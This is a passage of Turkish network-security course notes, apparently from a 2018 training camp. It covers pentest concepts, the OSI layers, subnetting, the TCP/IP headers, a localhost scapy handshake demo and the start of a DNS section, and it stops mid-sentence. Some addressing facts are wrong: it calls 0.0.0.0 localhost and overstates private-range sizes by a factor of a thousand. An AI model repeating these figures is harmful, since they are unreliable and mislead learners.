<!DOCTYPE HTML>
<html lang="en" class="sidebar-visible no-js">
    <head>
        <!-- Book generated using mdBook -->
        <meta charset="UTF-8">
        <title>MAOYYK2018</title>
        <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
        <meta name="description" content="Ağ Güvenliği ve Denetimi Kursu Notları">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="theme-color" content="#ffffff" />

        <link rel="shortcut icon" href="favicon.png">
        <link rel="stylesheet" href="css/variables.css">
        <link rel="stylesheet" href="css/general.css">
        <link rel="stylesheet" href="css/chrome.css">
        <link rel="stylesheet" href="css/print.css" media="print">

        <!-- Fonts -->
        <link rel="stylesheet" href="FontAwesome/css/font-awesome.css">
        <link href="https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" rel="stylesheet" type="text/css">
        <link href="https://fonts.googleapis.com/css?family=Source+Code+Pro:500" rel="stylesheet" type="text/css">

        <!-- Highlight.js Stylesheets -->
        <link rel="stylesheet" href="highlight.css">
        <link rel="stylesheet" href="tomorrow-night.css">
        <link rel="stylesheet" href="ayu-highlight.css">

        <!-- Custom theme stylesheets -->
        

        
    </head>
    <body class="light">
        <!-- Provide site root to javascript -->
        <script type="text/javascript">var path_to_root = "";</script>

        <!-- Work around some values being stored in localStorage wrapped in quotes -->
        <script type="text/javascript">
            try {
                var theme = localStorage.getItem('mdbook-theme');
                var sidebar = localStorage.getItem('mdbook-sidebar');

                if (theme.startsWith('"') && theme.endsWith('"')) {
                    localStorage.setItem('mdbook-theme', theme.slice(1, theme.length - 1));
                }

                if (sidebar.startsWith('"') && sidebar.endsWith('"')) {
                    localStorage.setItem('mdbook-sidebar', sidebar.slice(1, sidebar.length - 1));
                }
            } catch (e) { }
        </script>

        <!-- Set the theme before any content is loaded, prevents flash -->
        <script type="text/javascript">
            var theme;
            try { theme = localStorage.getItem('mdbook-theme'); } catch(e) { } 
            if (theme === null || theme === undefined) { theme = 'light'; }
            document.body.className = theme;
            document.querySelector('html').className = theme + ' js';
        </script>

        <!-- Hide / unhide sidebar before it is displayed -->
        <script type="text/javascript">
            var html = document.querySelector('html');
            var sidebar = 'hidden';
            if (document.body.clientWidth >= 1080) {
                try { sidebar = localStorage.getItem('mdbook-sidebar'); } catch(e) { }
                sidebar = sidebar || 'visible';
            }
            html.classList.remove('sidebar-visible');
            html.classList.add("sidebar-" + sidebar);
        </script>

        <nav id="sidebar" class="sidebar" aria-label="Table of contents">
            <ol class="chapter"><li class="affix"><a href="AgDenetimiveGuvenligi.html">Ağ Denetimi ve Güvenliği Giriş</a></li><li><a href="NetworkTemelleri.html"><strong aria-hidden="true">1.</strong> Ağ Temelleri</a></li><li><ol class="section"><li><a href="OSIKatmanlari.html"><strong aria-hidden="true">1.1.</strong> OSI Katmanları</a></li><li><a href="Subnet.html"><strong aria-hidden="true">1.2.</strong> Subnet (Alt Ağ)</a></li><li><a href="TcpIpProtokol.html"><strong aria-hidden="true">1.3.</strong> TCP/IP Protokol Kümesi</a></li><li><a href="TcpUdp.html"><strong aria-hidden="true">1.4.</strong> TCP/UDP</a></li><li><a href="DNS.html"><strong aria-hidden="true">1.5.</strong> DNS</a></li><li><a href="ICMPv4.html"><strong aria-hidden="true">1.6.</strong> ICMPv4</a></li><li><a href="ARP.html"><strong aria-hidden="true">1.7.</strong> ARP</a></li><li><a href="DHCP.html"><strong aria-hidden="true">1.8.</strong> DHCP</a></li></ol></li><li><a href="BilgiGuvenligi.html"><strong aria-hidden="true">2.</strong> Bilgi Güvenliği</a></li><li><ol class="section"><li><a href="OSINT.html"><strong aria-hidden="true">2.1.</strong> OSINT</a></li><li><a href="Aktif.html"><strong aria-hidden="true">2.2.</strong> Aktif Tarama</a></li><li><a href="AgGuvenligi.html"><strong aria-hidden="true">2.3.</strong> Ağ Güvenliği</a></li><li><a href="DNSZehirlenmesi.html"><strong aria-hidden="true">2.4.</strong> DNS Zehirlemesi</a></li><li><a href="Zafiyet.html"><strong aria-hidden="true">2.5.</strong> Zafiyet Tespiti</a></li><li><a href="CTF.html"><strong aria-hidden="true">2.6.</strong> CTF</a></li><li><a href="Kablosuz.html"><strong aria-hidden="true">2.7.</strong> Kablosuz Güvenliği</a></li></ol></li></ol>
        </nav>

        <div id="page-wrapper" class="page-wrapper">

            <div class="page">
                
                <div id="menu-bar" class="menu-bar">
                    <div id="menu-bar-sticky-container">
                        <div class="left-buttons">
                            <button id="sidebar-toggle" class="icon-button" type="button" title="Toggle Table of Contents" aria-label="Toggle Table of Contents" aria-controls="sidebar">
                                <i class="fa fa-bars"></i>
                            </button>
                            <button id="theme-toggle" class="icon-button" type="button" title="Change theme" aria-label="Change theme" aria-haspopup="true" aria-expanded="false" aria-controls="theme-list">
                                <i class="fa fa-paint-brush"></i>
                            </button>
                            <ul id="theme-list" class="theme-popup" aria-label="Themes" role="menu">
                                <li role="none"><button role="menuitem" class="theme" id="light">Light <span class="default">(default)</span></button></li>
                                <li role="none"><button role="menuitem" class="theme" id="rust">Rust</button></li>
                                <li role="none"><button role="menuitem" class="theme" id="coal">Coal</button></li>
                                <li role="none"><button role="menuitem" class="theme" id="navy">Navy</button></li>
                                <li role="none"><button role="menuitem" class="theme" id="ayu">Ayu</button></li>
                            </ul>
                            
                            <button id="search-toggle" class="icon-button" type="button" title="Search. (Shortkey: s)" aria-label="Toggle Searchbar" aria-expanded="false" aria-keyshortcuts="S" aria-controls="searchbar">
                                <i class="fa fa-search"></i>
                            </button>
                            
                        </div>

                        <h1 class="menu-title">MAOYYK2018</h1> 

                        <div class="right-buttons">
                            <a href="print.html" title="Print this book" aria-label="Print this book">
                                <i id="print-button" class="fa fa-print"></i>
                            </a>
                        </div>
                    </div>
                </div>

                
                <div id="search-wrapper" class="hidden">
                    <form id="searchbar-outer" class="searchbar-outer">
                        <input type="search" name="search" id="searchbar" name="searchbar" placeholder="Search this book ..." aria-controls="searchresults-outer" aria-describedby="searchresults-header">
                    </form>
                    <div id="searchresults-outer" class="searchresults-outer hidden">
                        <div id="searchresults-header" class="searchresults-header"></div>
                        <ul id="searchresults">
                        </ul>
                    </div>
                </div>
                

                <!-- Apply ARIA attributes after the sidebar and the sidebar toggle button are added to the DOM -->
                <script type="text/javascript">
                    document.getElementById('sidebar-toggle').setAttribute('aria-expanded', sidebar === 'visible');
                    document.getElementById('sidebar').setAttribute('aria-hidden', sidebar !== 'visible');
                    Array.from(document.querySelectorAll('#sidebar a')).forEach(function(link) {
                        link.setAttribute('tabIndex', sidebar === 'visible' ? 0 : -1);
                    });
                </script>

                <div id="content" class="content">
                    <main>
                        <p>Kamp içeriği olarak Ağ Yönetimi konusuna giriş yapıldıktan sonra varsayılan
ayarlardan kaynaklanan güvenlik zafiyetleri anlatılacak ve bununla birlikte
savunma bakış açısı güçlendirilebilecektir.</p>
<p>Güvenlik konusunda danışmanlar ve saldırganlar arasındaki benzerlik ve
farklılıklardan bahsederek kampa başladık. Saldırganlar motivasyon ve zaman
açısından, güvenlik danışmanlarına göre daha şanslıdırlar. Danışmanların belirli
bir çalışma aralığı olmasına rağmen saldırganların motivasyon kaynağına göre bu
zaman kavramı genişleyebilir. Ayrıca danışmanlar firma tarafında çalışan
sistemlerin kararlılığının bozulmaması amacıyla firma tarafından bazı
sistemlerin erişimine izin verilmeyebilir. Saldırganlar ise bu konuda daha çok
esnektir ve sistemin kararlılığını korumak gibi bir amaçları olmadığından ciddi
hasarlar verebilirler. Zafiyet bulunduktan sonra danışmanlar sömürüyü
gerçekleştirirken bunu ispatlamak için yaparken, saldırganlar sistemin
içerisinde istedikleri bilgiyi elde etmek için kendi amaçları doğrultusunda
kullanırlar. Saldırganların sistemden izini silmek ve daha sonra tekrardan
erişebilmek için arka kapı bırakırlar fakat güvenlik danışmanlarının böyle bir
amacı yoktur.</p>
<p><strong>Hacking:</strong> Bir sistemi çalışması planlanan şekli dışında kullanmak.</p>
<p><strong>Ethical Hacking:</strong> Sistemlere sızmak için saldırganlar tarafından kullanılan
yöntemlerin kurumların güvenlik seviyesini arttırmak amacıyla, siber tehditlere
ve veri sızıntılarına karşı test edilmesi ve daha etkili savunma yöntemlerinin
geliştirilmesini savunan felsefedir.</p>
<p><strong>Risk:</strong> Tehdit ve zafiyetin kesiştiği nokta.</p>
<p><strong>Total Risk Analizi:</strong> Sistemde ki bir zafiyetin ne kadar risk
oluşturabileceğini raporlayıp analiz etmektir.</p>
<p><strong>Zafiyet:</strong> Bir sistemin olağan davranışını bozmasına sebep olan nokta.</p>
<p><strong>[!] Sadece zafiyet taraması veya Bug Bounty yapılarak total risk analizi
yapılamaz.</strong></p>
<p><strong>Sömürü (exploitation):</strong> Zafiyeti veya zafiyetleri kullanarak sistemde yer
edinme işlemi.</p>
<p><strong>Post Explotation</strong> Sömürü gerçekleştirildikten sonra bilgi toplama ve başka
sistemlere geçme aşamasına verilen isim.</p>
<p><strong>Payload:</strong> Exploit ile sistemde yer edindikten sonra çalıştırılmak istenen kod
parçası.</p>
<p><strong>Penetration Test:</strong> Hacking işleminin teknik aşamalarını kapsayan sürece
verilen genel adıdır.</p>
<p><strong>Vulnerability/Security Assessment:</strong> Bir sistemdeki muhtemel tüm açıkların
belirlenmesine yönelik tasarlanmış bir testtir. Sızma testinin bir aşamasıdır.</p>
<p><strong>Güvenlik denetimi:</strong> Güvenlik araştırmacıları için total riski raporlamakken
saldırganların bunu kendi lehine kullanması amacıyla yaptıkları denetimdir.</p>
<p><strong>[!] Zafiyet bulunduktan sonra güvenlik danışmanlarının zafiyeti düzeltmek gibi
bir amacı yoktur.</strong></p>
<p><strong>[!] Sızma testi raporlarında zafiyetten bahsedilir ama asıl amaç zafiyetlerin
raporlanıp verilmesi değil olası senaryolarla firmayı bilgilendirmektir.</strong></p>
<p><strong>Risk analizi disiplini:</strong> Birimlerin ayrı ayrı güvenliğinin incelenmesi olarak
tanımlandırılabilir. Sadece kale kapısını tutmak değil içerideki kapıları da
sağlamlaştırmak buna örnek olarak verilebilir.</p>
<p>Bazı firmalar güvenlik açığının bildirilmesi üzerine zafiyeti düzeltmemeyi
seçebilirler çünkü zafiyeti düzeltmek firmalar için daha masraflı olabilir.
Bu durumda danışmanlar zafiyeti puanlayarak bir bilgilendirme yapar. Yani
danışmanlar her zaman zafiyeti düzeltme amacı gütmez. Zafiyetin ne kadar büyük
bir risk oluşturabileceğini raporlar.</p>
<p>Güvenlik denetimlerinin standartlarının olması, ihtiyaçların giderilmesi ve
güvenlik danışmanlarının kaybolmaması için metodolojilere ihtiyaç vardır.  Bazı
kurumlar kendi standartlarını yayınlar.</p>
<ul>
<li><a href="https://www.owasp.org/">OWAP</a>: Web App Security</li>
<li><a href="https://www.nist.gov/">NIST</a>: National Institute of Standards and Technology.</li>
<li><a href="http://www.isecom.org/research/">OSSTMM</a>: Yukarıdaki firmalara göre daha kapsamlıdır.</li>
</ul>
<p>Karşı tarafın izni olmaması durumunda yapılan herhangi bir zafiyet taraması suç
teşkil etmektedir. Tesadüfen bulunan bir zafiyet var ise bunu bildirmek herhangi
bir suç teşkil etmemektedir. Kurumlar bu konuda eskiye göre daha çok anlayışlı
davranmaktadırlar. Profesyonel olarak test yapılacağı zaman gizlilik anlaşması
yapılır. Bu anlaşmanın içinde ilgili firmadan alınan bilgilerin ne kadarının
yayınlanabileceği ve yapılacak işlemler belirtilerek sözleşme imzalanır. Daha
sonrasında bu testler gerçekleştirilerek ortaya bir rapor konur. Bu çoğunlukla
hard-copy bile olmaz hatta tek bir pdf dosyası bile olabilir.</p>
<p><strong>Sızma Testleri - Genel Prosedür:</strong></p>
<ul>
<li>Hazırlık Aşaması
<ul>
<li>NDA imzalanması (Gizlilik anlaşması)</li>
<li>Test içeriğinin belirlenmesi</li>
<li>Güvenlik Sözleşmesinin İmzalanması</li>
<li>Sızma Testi Takımının Belirlenmesi</li>
</ul>
</li>
<li>Güvenlik Testinin Gerçekleştirimesi</li>
<li>Sonuçların Alınması ve Raporlanması</li>
</ul>
<p>Sızma Testi Kapsamları:</p>
<ul>
<li>Public Ip Adresi Aralıkları</li>
<li>Özel Uygulamalar</li>
<li>Özel Alan Adları ve Subdomainler</li>
</ul>
<p>Güvenlik Denetim Türleri:</p>
<ul>
<li>Network Testleri</li>
<li>İstemci Testleri</li>
<li>Cloud(Bulut) Testleri</li>
<li>Web Uygulama Testleri</li>
<li>Kablosuz Ağ Testleri</li>
<li>Sosyal Mühendislik Testleri</li>
<li>Mobil Uygulama Testleri</li>
<li>Tersine Mühendislik</li>
<li>Sosyal Mühendislik veya Servis dışı bırakma (Ddos) testleri</li>
<li>Gömülü Sistem Testleri</li>
</ul>
<p><strong>[!] Çok nadir olmakla birlikte fiziksel olarakta test yapılabilir. Mesela boş
bir bilgisayara erişim sağlamak, kameralara yakalanmadan yasak yerlere
girebilmek bu test için örnek verilebilir.</strong></p>
<p><strong>OSI Katmanları</strong></p>
<p><strong>Subnet (Alt Ağ)</strong></p>
<p><strong>TCP/IP Protokol Kümesi</strong></p>
<p><strong>TCP/UDP</strong></p>
<p><strong>ICMPv4</strong></p>
<p><strong>ARP</strong></p>
<p><strong>DNS</strong></p>
<p><strong>DHCP</strong></p>
<a class="header" href="#osi-katmanları" id="osi-katmanları"><h1>OSI Katmanları</h1></a>
<table><thead><tr><th> * </th><th align="center"> Katmanlar       </th></tr></thead><tbody>
<tr><td> 1 </td><td align="center"> Fiziksel        </td></tr>
<tr><td> 2 </td><td align="center"> Data            </td></tr>
<tr><td> 3 </td><td align="center"> Network         </td></tr>
<tr><td> 4 </td><td align="center"> Taşıma          </td></tr>
<tr><td> 5 </td><td align="center"> Oturum          </td></tr>
<tr><td> 6 </td><td align="center"> Sunum           </td></tr>
<tr><td> 7 </td><td align="center"> Uygulama        </td></tr>
</tbody></table>
<p><strong>[!] Yukarıdaki katmanların amacı sistemdeki her katmanın birbirlerinden
etkilenmeden kendi içlerinde değişiklik uygulanılabilmesidir.</strong></p>
<p><strong>1) Fiziksel Katman</strong> : BitStream(0-1). Fiber, Bakır tel gibi fiziksel aktarım
yöntemleri kullanılan katmandır.</p>
<p><strong>2) Data Katmanı</strong> : Bu katmanda fiziksel ağ donanımının adresi kullanılır
<em>MAC</em> . Ethernet varsa ARP(Adress Resoluiton Protocol) örnek verilebilir. ARP ve
RARP sorgularıyla MAC veya IP adresi bilinen bir makinanın diğer bilgisi
öğrenilebilir.</p>
<p>MAC Adresi, Bir ağdaki cihazı tanımlanmasını sağlayan fiziksel ağ kartının
üzerindeki adresi belirtir. Bu adres 6 oktetten oluşur
(00:00:00:00:00:00-FF:FF:FF:FF:FF:FF). MAC adresinin ilk 3 okteti cihazı üreten
firmayı, son 3 oktet ise her kart için benzersizdir.</p>
<p>IP --ARP--&gt; MAC</p>
<p>MAC --RARP--&gt; IP</p>
<p>ARP tablosunda iletişim kurulmak istenen makinanın mac adresi yoksa, icmp
requesti (ping), iletişim kurulmak istenen sistemin ip adresine gönderilerek
karşılıklı olarak arp tablolarını güncelleyebiliriz.</p>
<p>ARP tablosunu kontrol etmek için terminalde: Linux sistemlerde “arp -an”,
Windows sistemlerde “arp -a” yazılarak tablo gösterilebilir. ARP tablosundan
girdi silmek için her iki sistemde de aynı “arp -d” komutu kullanılabilir.</p>
<p>MAC adresinin kullanıldığı protokollere aşağıdakiler örnek olarak verilebilir.</p>
<ul>
<li>Ethernet</li>
<li>Token ring</li>
<li>Wi-fi</li>
<li>Bluetooth</li>
<li>FDDI</li>
<li>SCSI</li>
</ul>
<p><strong>3) Network Katman</strong> : TCP/IPv4 veya TCP/IPv6 ile adreslerin oluşturulup
makinalara tanımlandığı katman.</p>
<p>IPv4 32bitlik adresleme yapabilir. 2^32 den 4294967296 adres üretilebilir ama
bunu daha kolay şekilde okuyabilmek için 32 bit 4’erli gruplar halinde 0-255
arasında ifade edilir.</p>
<p>0.0.0.0 &lt;--&gt; Localhost</p>
<p>255.255.255.255 &lt;--&gt; Broadcast (Yayın Adresi)</p>
<p><strong>4) Taşıma Katman</strong> : İletişim protokolleri TCP veya UDP kullanılır. TCP
outurum kontrolü yaparken, UDP herhangi bir iletişim veya paket bütünlüğü
kontrolü yapmaz. UDP bu yüzden TCP’den daha hızlıdır.</p>
<p><strong>5) Oturum Katman</strong> : Servislerin birbirleriyle iletişimini sağlayan katman.
(SSH/RDP/SMB)</p>
<p><strong>6) Sunum Katman</strong> : Paketi uygun hale getirir. Çeşitli format değişimleri
burada yapılır. (PNG--base64--&gt;ascii, SSL,TLS)</p>
<p><strong>7) Uygulama Katman</strong> : Firefox, FTP, SMTP, HTTP</p>
<a class="header" href="#subnet-alt-ağ" id="subnet-alt-ağ"><h1>Subnet (Alt Ağ)</h1></a>
<p>IP Havuz aralığı içerisinde ihtiyaç kadar ip adresi tanımlamak için kullanılır.</p>
<p>192.168.48.130</p>
<p>11000000.10101000.00111000.100|00010</p>
<p>11111111.11111111.11111111.111|00010</p>
<p>255.255.255.224</p>
<p>11111111.11111111.11111111.111|00000 (Alt Ağ Adresi)</p>
<p>11111111.11111111.11111111.111|11111 (Alt Ağ Yayın Adresi)</p>
<p>Dünya çapıında bu ip bloklarının yönetimini IANA (Internet Assigned Numbers
Authority) yapar. Zamanla ip adresi yetmemeye başladığından NAT(Network Address
Translation) ortaya çıkmıştır. Bunun yapılabilmesi için tek gereken şey
internet ile alt ağlar arasında <strong>adres dönüşümü</strong> gerçekleştirilmesidir.</p>
<p>10.0.0.0/8 A &lt;--&gt; Yaklaşık olarak 16 milyar ip adreslenebilir. [ 2^(32-8) ]</p>
<p>172.16.0.0./12 &lt;--&gt; Yaklaşık olarak 1 milyar ip adreslenebilir. [ 2^(32-12) ]</p>
<p>192.168.0.0/16 &lt;--&gt; Yaklaşık olarak 65 bin ip adreslenebilir. [ 2^(32-16) ]</p>
<p>127.0.0.0/8 &lt;--&gt; Localhost. LoopBack (lo) kendi makine içerisindeki ağ.</p>
<p>224.0.0.0/4 D &lt;--&gt; MultiCast. Her ip adresine teker teker göndermek yerine.
Herkese broadcast yapar gibi paketleri göndermek için ayrılmış ip bloğudur.</p>
<p>100.100.0.0/16 &lt;--&gt; Şu anda boşta olan ip bloğudur.</p>
<p>240.0.0.0/4 E &lt;--&gt; Bilimsel testler için ayrılmış ip bloğudur.</p>
<p>169.254.0.0/16 APIPA &lt;--&gt; DHCP serveri olmadığı zaman bu ip bloğundan rastgele
ip alır.</p>
<p><strong>[!] Yukarideki ip adresleri dışında private ip olarak başka bir bloğun
kullanılması durumunda internet üzerinde o ip bloğundaki sunuculara uzaktan
erişilmek istendiği zaman paket private ağ içerisinde gezeceği için kullanıcı
kendi ağı dışarısındaki sunucuya ulaşamayacaktır.</strong></p>
<a class="header" href="#tcpip-protokol-kümesi" id="tcpip-protokol-kümesi"><h1>TCP/IP Protokol Kümesi</h1></a>
<p><strong>[!] OSI katmanı referans olarak alındığı için birebir olarak günümüzde
kullanılmaz.</strong></p>
<table><thead><tr><th align="center"> Cihaz veya Uygulamlar   </th><th align="center"> Paketin İsmi      </th><th align="center"> TCP/IP          </th><th align="center"> OSI Katmanı   </th></tr></thead><tbody>
<tr><td align="center"> SSL                     </td><td align="center">                   </td><td align="center">                 </td><td align="center"> Application   </td></tr>
<tr><td align="center"> VPN                     </td><td align="center">                   </td><td align="center">                 </td><td align="center"> ------------  </td></tr>
<tr><td align="center"> Application Firewall    </td><td align="center"> Data              </td><td align="center"> Applicaiton     </td><td align="center"> Presentation  </td></tr>
<tr><td align="center"> DLP                     </td><td align="center">                   </td><td align="center">                 </td><td align="center"> ------------  </td></tr>
<tr><td align="center">                         </td><td align="center">                   </td><td align="center">                 </td><td align="center"> Session       </td></tr>
<tr><td align="center"> ----------------------  </td><td align="center"> ----------------- </td><td align="center"> --------------- </td><td align="center"> ------------  </td></tr>
<tr><td align="center"> Firewall, Load Balancer </td><td align="center"> Segment/Datagram  </td><td align="center"> Transport       </td><td align="center"> Transport     </td></tr>
<tr><td align="center"> ----------------------  </td><td align="center"> ----------------- </td><td align="center"> --------------- </td><td align="center"> ------------  </td></tr>
<tr><td align="center"> Router                  </td><td align="center"> Packet            </td><td align="center"> İnternet        </td><td align="center"> Network       </td></tr>
<tr><td align="center"> ----------------------  </td><td align="center"> ----------------- </td><td align="center"> --------------- </td><td align="center"> ------------- </td></tr>
<tr><td align="center"> Switch                  </td><td align="center"> Frame             </td><td align="center">                 </td><td align="center"> Data Link     </td></tr>
<tr><td align="center"> RJ45                    </td><td align="center"> ----------------- </td><td align="center"> Network Access  </td><td align="center"> ------------  </td></tr>
<tr><td align="center"> Cat5                    </td><td align="center"> BitStream         </td><td align="center">                 </td><td align="center"> Physical      </td></tr>
</tbody></table>
<a class="header" href="#tcpudp" id="tcpudp"><h1>TCP/UDP</h1></a>
<p><strong>TCP:</strong> Bir makinayla iletişime geçmek istendiğinde diğer makina geri dönüş
yaparak iletişimi onaylar ve iletişim sürekli birbirlerinin paket onaylarını
bekleyerek devam eder. Bunun faydası ise herhangi bir kayıp olmadan verinin
karşı tarafa iletilmesini sağlayabilmesidir. Bağlantı kurulurken ve
koparilirken de bu üçlü el sıkışma yapılır.</p>
<p><strong>UDP:</strong> Paket hedef makinaya gönderilir ama herhangi bir onay sistemi olmadığı
için paketin gidip gitmediği tam olarak bilinemez. Gelmeyen paketlerde uygulama
bunu kontrol etmek zorundadır. UDP’nin paket bütünlüğüyle ilgili herhangi bir
kontrol mekanizması yoktur.</p>
<a class="header" href="#aÜçlü-el-sıkışma-3-way-handshake" id="aÜçlü-el-sıkışma-3-way-handshake"><h2>Üçlü El Sıkışma (3 Way HandShake)</h2></a>
<p>-----SYN---&gt;</p>
<p>&lt;--SYN-ACK--</p>
<p>----ACK----&gt;</p>
<p>----FIN----&gt;</p>
<p>&lt;-FIN-ACK---</p>
<p>----ACK----&gt;</p>
<hr />
<a class="header" href="#tcp-header" id="tcp-header"><h2>TCP HEADER</h2></a>
<p><img src="pic/tcp_header.png" alt="tcp-header" /></p>
<p><strong>Source Port:</strong> Kaynak makinanın Portu</p>
<p><strong>Destination Port:</strong> Hedef makinanın Portu</p>
<p><strong>Sequence Number:</strong> Senkronize Numarası</p>
<p><strong>Acknowledgement Number:</strong> En son alınan senkron paketinin bir fazlası</p>
<p><strong>Hlen:</strong> TCP başlık kısmının uzunluğı</p>
<ul>
<li>Flags
<ul>
<li>URG:  Acil Biti</li>
<li>ACK:  Acknowledge Biti</li>
<li>PSH:  Push Biti</li>
<li>RST:  Reset Biti</li>
<li>SYN:  Senkron Biti</li>
<li>FIN:  Bitiirme Biti</li>
</ul>
</li>
</ul>
<p><strong>Windows:</strong> Alıcının kaç paketi birden istediği bilgisi</p>
<p><strong>Checksum:</strong> Paketin bütünlüğünü doğrular.</p>
<p><strong>Urgent Pointer:</strong> URG biti işaretlendiyse kullanılır.</p>
<hr />
<a class="header" href="#ip-header" id="ip-header"><h2>IP HEADER</h2></a>
<p><img src="pic/ip_header.png" alt="ip-header" /></p>
<p><strong>Version:</strong> IPv4 veya IPv6</p>
<p><strong>Length:</strong> Paketin uzunluğu</p>
<p><strong>Type of Service:</strong> Servis tipini belirtir Routerlar buna göre öncelik ataması
yaparlar</p>
<p><strong>Total Length:</strong> Paketin toplam uzunluğu</p>
<p><strong>Identifier:</strong> Her paketin numarası</p>
<p><strong>Flag:</strong> Paketin parçalanıp parçalanmayacağı bilgisi</p>
<p><strong>Fragmented Offset:</strong> Parçalanmış paketlerin sıra numarası</p>
<p><strong>Time to Live:</strong> Paketin yaşam süresi</p>
<p><strong>Protocol:</strong> TCP ya da UDP hangi alt katmanlı paket içerdeiğini gösterir</p>
<p><strong>Header Checksum:</strong> Doğrulamayı barındırır</p>
<p><strong>Source IP:</strong> Kaynak ip</p>
<p><strong>Destination IP:</strong> Hedef ip</p>
<hr />
<a class="header" href="#scapy-3way-handshake" id="scapy-3way-handshake"><h2>Scapy 3way-Handshake</h2></a>
<pre><code>$ iptables -I OUTPUT -p tcp --tcp-flags RST RST -j DROP # RST Sinyalini engellemek için
$ nc -lvp 80 # Başka bir terminalden
$ scapy
&gt;&gt;&gt; conf.L3socket=L3RawSocket
&gt;&gt;&gt; ip = IP(src=&quot;127.0.0.1&quot;,dst=&quot;127.0.0.2&quot;)
&gt;&gt;&gt; SYN = TCP(sport=1234,dport=80,flags=&quot;S&quot;)
&gt;&gt;&gt; veri = &quot;Merhaba\n&quot;
&gt;&gt;&gt; sr1(ip/SYN)
Begin emission:
.*Finished sending 1 packets.

Received 2 packets, got 1 answers, remaining 0 packets
&lt;IP  version=4 ihl=5 tos=0x0 len=44 id=0 flags=DF frag=0 ttl=64 proto=tcp chksum=0x3cc9 src=127.0.0.2 dst=127.0.0.1 options=[] |&lt;TCP  sport=www_http dport=search_agent seq=2957853120 ack=1 dataofs=6 reserved=0 flags=SA window=43690 chksum=0xfe21 urgptr=0 options=[('MSS', 65495)] |&gt;&gt;
&gt;&gt;&gt; ACK = TCP(sport=1234,dport=80,flags=&quot;A&quot;,seq=1,ack=2957853121)
&gt;&gt;&gt; sr1(ip/ACK/veri)
Begin emission:
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets
&lt;IP  version=4 ihl=5 tos=0x0 len=40 id=26505 flags=DF frag=0 ttl=64 proto=tcp chksum=0xd543 src=127.0.0.2 dst=127.0.0.1 options=[] |&lt;TCP  sport=www_http dport=search_agent seq=2957853121 ack=9 dataofs=5 reserved=0 flags=A window=43690 chksum=0xfe1d urgptr=0 |&gt;&gt;
&gt;&gt;&gt; FINACK = TCP(sport=1234,dport=80,flags=&quot;FA&quot;,seq=9,ack=2957853121)
&gt;&gt;&gt; sr1(ip/FINACK)
Begin emission:
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets
&lt;IP  version=4 ihl=5 tos=0x0 len=40 id=26506 flags=DF frag=0 ttl=64 proto=tcp chksum=0xd542 src=127.0.0.2 dst=127.0.0.1 options=[] |&lt;TCP  sport=www_http dport=search_agent seq=2957853121 ack=10 dataofs=5 reserved=0 flags=FA window=43690 chksum=0xfe1d urgptr=0 |&gt;&gt;
&gt;&gt;&gt; ACK = TCP(sport=1234,dport=80,flags=&quot;A&quot;,seq=10,ack=2957853121)
&gt;&gt;&gt; sr1(ip/ACK)
Begin emission:
.Finished sending 1 packets.
*
Received 2 packets, got 1 answers, remaining 0 packets
&lt;IP  version=4 ihl=5 tos=0x0 len=40 id=22525 flags=DF frag=0 ttl=64 proto=tcp chksum=0xe4cf src=127.0.0.2 dst=127.0.0.1 options=[] |&lt;TCP  sport=www_http dport=search_agent seq=2957853121 ack=0 dataofs=5 reserved=0 flags=R window=0 chksum=0xbaac urgptr=0 |&gt;&gt;
</code></pre>
<p><img src="pic/tcp-scapy-3way-handshake.png" alt="tcp-scapy-3way-handshake" /></p>
<hr />
<a class="header" href="#port-durumlari" id="port-durumlari"><h2>PORT DURUMLARI</h2></a>
<a class="header" href="#tcp" id="tcp"><h3>TCP</h3></a>
<table><thead><tr><th> TCP/Port </th><th align="center"> Açık    </th><th align="center"> Kapalı </th><th align="center"> Cevap Gelmezse    </th></tr></thead><tbody>
<tr><td> SYN      </td><td align="center"> SYN+ACK </td><td align="center"> RST    </td><td align="center"> Firewall olabilir </td></tr>
<tr><td> ACK      </td><td align="center"> RST     </td><td align="center"> RST    </td><td align="center"> Makina Yok        </td></tr>
<tr><td> FIN      </td><td align="center"> RST     </td><td align="center"> RST    </td><td align="center"> Bağlantı Problemi </td></tr>
<tr><td> URG      </td><td align="center"> RST     </td><td align="center"> RST    </td><td align="center"> Servis Dışı Kalma </td></tr>
<tr><td> RST      </td><td align="center"> X       </td><td align="center"> X      </td><td align="center">                   </td></tr>
</tbody></table>
<hr />
<a class="header" href="#udp" id="udp"><h3>UDP</h3></a>
<table><thead><tr><th> UDP/Port </th><th> Açık          </th><th> Kapalı                   </th><th> Cevap Gelmezse </th></tr></thead><tbody>
<tr><td>          </td><td align="center"> Cevap Gelirse </td><td align="center"> ICMP(Port Unreach) Döner </td><td align="center"> Açık/Firewall  </td></tr>
</tbody></table>
<a class="header" href="#dns" id="dns"><h1>DNS</h1></a>
<p><strong>Hostname:</strong> Makinaya verilen kimlik bilgisi.</p>
<p><strong>Domain:</strong> Bir grup bilgisayarın oluşturduğu ağa verilen kimlik bilgisi.</p>
<p>Her makinada nameserver, dhcp veya elle atatanmış olduğu için oradaki domain
sunucularına sorar (Recursive).  TLD(TopLevelDomain)’e sorar o sunucuda .tr
kaydı tutan sunuculara sordurur burdan org.tr domainlerini tutan sunucuya
yönlendirir burdan da linux.org.tr sunucusunun ip adresini cachler ve bundan
sonraki isteklerde bu yapılan işlem tekrardan gerçekleşmez.</p>
<p>DNS(Domain Name System) website adreslerini ip adreslerine çevirmek için
kurulmuştur. 2003 yıllından sonra websitelerinin sayısı ip adreslerini geçmeye
başlayacağı için tek bir makinada birden fazla site bulunmaya başlamıştır.</p>
<p>İşletim sistemi ilk olarak gelen DNS kaydını /etc/hosts veya
/system32/drivers/etc/hosts dosyasına bakar varsa zaten direk ip adresini
kullanır. Eğer herhangi bir kayıt yoksa, DHCP serverin bize atadığı nameserver
olan 1.1.1.1 olan sunucuya dns protokolü üzerinden “linux.org.tr” domaninini
sorar eğer onun üzerinde de bu kayıt yoksa. 1.1.1.1’de ki sunucu kaydı bilmese
de *.tr kayıtlarını tutan nic.tr sunucusuna “linux.org.tr” sorar. En son
linux.org.tr’nin geriye doğru sunuculara ip adresi eklenir ve 1.1.1.1 bize
istediğimiz domainin ip adresini döndürür ve bizden biraz sonra 1.1.1.1’e
linux.org.tr’yi sorarsa bu işlemler tekrardan yaşanmaz. Artık 1.1.1.1’in kendi
